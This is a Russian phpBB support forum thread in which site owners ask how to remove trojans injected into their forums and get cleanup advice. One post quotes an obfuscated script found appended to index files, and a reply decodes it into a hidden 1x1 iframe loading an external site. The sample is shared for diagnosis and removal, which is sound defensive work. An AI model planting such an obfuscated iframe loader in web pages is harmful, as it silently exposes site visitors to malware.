Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 18 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
Fray98rus
Former team member
Сообщения: 442
Стаж: 17 лет 6 месяцев
Откуда: Санкт-Петербург
Благодарил (а): 1 раз
Поблагодарили: 1 раз

Re: Как убить Трояна?

Сообщение Fray98rus »

xkaa писал(а):под учетной записью "старого" админа уже нельзя будет?
Обновите пароль старого админа и все, только после удаления трояна.
xkaa
phpBB 1.0.0
Сообщения: 7
Стаж: 17 лет

Re: Как убить Трояна?

Сообщение xkaa »

Fray98rus, спасибо, но тут сложнее. Я описал ситуацию здесь: http://www.phpbbguru.net/community/topi ... ml#p233212

Палыч, уточните, пожалуйста, по моим вопросам и что-нибудь про ссылку...

Спасибо.
Аватара пользователя
Палыч
Former team member
Сообщения: 9683
Стаж: 18 лет 11 месяцев
Откуда: Питер
Благодарил (а): 1 раз
Поблагодарили: 27 раз

Re: Как убить Трояна?

Сообщение Палыч »

xkaa писал(а):но тут сложнее.
Ничего сложного. Вам требуется получить доступ к админке. Вот и получите.
Можете через админку изменить всё, что вам требуется.
Fray98rus вам правильно подсказывает дальнейшие действия.
Ссылку поправил.
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
Sleepy
phpBB 1.0.0
Сообщения: 3
Стаж: 16 лет 2 месяца

Re: Как убить Трояна?

Сообщение Sleepy »

Доброе время суток!
Мой форум был заражен вирусом, об этом сообщили пользователи, у которых антивирусник аваста, тут же сменила пароль, проверила комп на вирусы, удалила их, вручную проверила основные файлы, которые могли быть заражены, инфреймов не нашла, скриптов левых тоже, тогда сделала полный бэкап файлов форума. Ничего не изменилось, пользователи с авастой пишут о вирусах, а другие жалуются на незначительные глюки. Проверяла форум различными вебсканерами, они вирусов не видят, у самой меня все нормально. Что еще можно сделать? Честно говоря, думала, что бэкап должен помочь был точно Оо
Буду оч благдарна. если поможете советом)

П.С. www.forum.kaulitztwins.ru
Аватара пользователя
Палыч
Former team member
Сообщения: 9683
Стаж: 18 лет 11 месяцев
Откуда: Питер
Благодарил (а): 1 раз
Поблагодарили: 27 раз

Re: Как убить Трояна?

Сообщение Палыч »

Sleepy
Посоветовать пишушим пользователям очистить кеш на своих браузерах.
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
Sleepy
phpBB 1.0.0
Сообщения: 3
Стаж: 16 лет 2 месяца

Re: Как убить Трояна?

Сообщение Sleepy »

Один из пишущих о вирусах - модератор. Она удаляла кэш, загружала форум с разных браузеров (после удаления кэша), проверяла комп на вирусы, перезагружала и т.д. Аваста пишет: обнаружен червь HTML:iFrame-inf.
Аватара пользователя
DK7
Former team member
Сообщения: 1008
Стаж: 18 лет 9 месяцев
Откуда: Кишинёв
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение DK7 »

кроме файлов, iFrame может в описаниях к форуму к примеру быть. Сделайте беккап бд, и в нём поищите <iframe src=
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 19 лет 10 месяцев
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Rayden »

Sleepy писал(а):тут же сменила пароль, проверила комп на вирусы, удалила их, вручную проверила основные файлы, которые могли быть заражены, инфреймов не нашла, скриптов левых тоже, тогда сделала полный бэкап файлов форума.
Вообще-то надо делать наоборот - сначала чистить комп, а уж потом на чистом менять пароль.
phpBB2 FAQ
phpBB3 FAQ
Sleepy
phpBB 1.0.0
Сообщения: 3
Стаж: 16 лет 2 месяца

Re: Как убить Трояна?

Сообщение Sleepy »

Оказалось в phpbb_config, всем спасибо))
Аватара пользователя
SDSFox
phpBB 1.2.0
Сообщения: 15
Стаж: 16 лет 11 месяцев

Re: Как убить Трояна?

Сообщение SDSFox »

Вот опять какая-то хрень прицепилась во всех Index файлах:

Код: Выделить всё

<!-- http://www.google-analytics.com --><script>var source ="=jgsbnf!tsd>#iuuq;00tfpusbgg/cj{0hpphmf0jgsbnf/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = ""; 
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); 
document.write(result); </script><!--/ http://www.google-analytics.com -->
кто-нибудь понимает вредоносность данного скрипта?
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 19 лет 8 месяцев
Откуда: Новосибирск
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Alek$ »

SDSFox писал(а):кто-нибудь понимает вредоносность данного скрипта?
Оно же, только раскодированное:

Код: Выделить всё

<iframe src="http://seotraff.biz/google/iframe.php" width=1 height=1 style="visibility: hidden"></iframe>
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Аватара пользователя
Garret_Dark
phpBB 2.0.16
Сообщения: 1097
Стаж: 16 лет 3 месяца
Откуда: root/world/russia/
Благодарил (а): 17 раз
Поблагодарили: 24 раза

Re: Как убить Трояна?

Сообщение Garret_Dark »

Сегодня обнаружил у себя на форуме во всех файлах index.* такого зверя HEUR:Trojan.Script.Iframer заметил только изза того что индексные страницы перестали запускаться и выдавало ошибку (в конце файла добавлялся код трояна)
Как он мог туда попасть я ума не приложу, к FTP имею доступ только я, но буквально вчера проверял свой комп на вирусы полным сканированием Касперского 8 (именно им потом обнаружил заразу в скачанном index.php), на бэкапе файлов форума недельной давности вирусов нет, можно грешить на хостера? Я вобще FTP клиентами не пользуюсь, все через вебинтерфейс Cpanel оперой, пароль только в голове, на компе никогда не сохранял...
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 19 лет 10 месяцев
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Rayden »

Ну и чего ты сюда пишешь? Чтоб потрындить как бабульки на лавочке и догадки высказывать?
Обратись к хостеру, пусть смотрят логи, кто и когда изменял файлы. Как это происходило, по фтп или еще как.
phpBB2 FAQ
phpBB3 FAQ
Srogov
phpBB 1.0.0
Сообщения: 2
Стаж: 15 лет 11 месяцев

Re: Как убить Трояна?

Сообщение Srogov »

Если антивирусы не видят, придется вручную посмотреть iframe.
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 19 лет 10 месяцев
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Rayden »

Srogov
Думаешь он месяц ждал твоего совета?
Причем совета откровенно тупого.
Garret_Dark писал(а):буквально вчера проверял свой комп на вирусы полным сканированием Касперского 8
Srogov писал(а):Если антивирусы не видят, придется вручную посмотреть iframe.
Предлагаешь полное сканирование компа вручную, чтоб искать фреймы??? В экзешниках тоже будешь вручную искать?
phpBB2 FAQ
phpBB3 FAQ

Вернуться в «phpBB-пространство»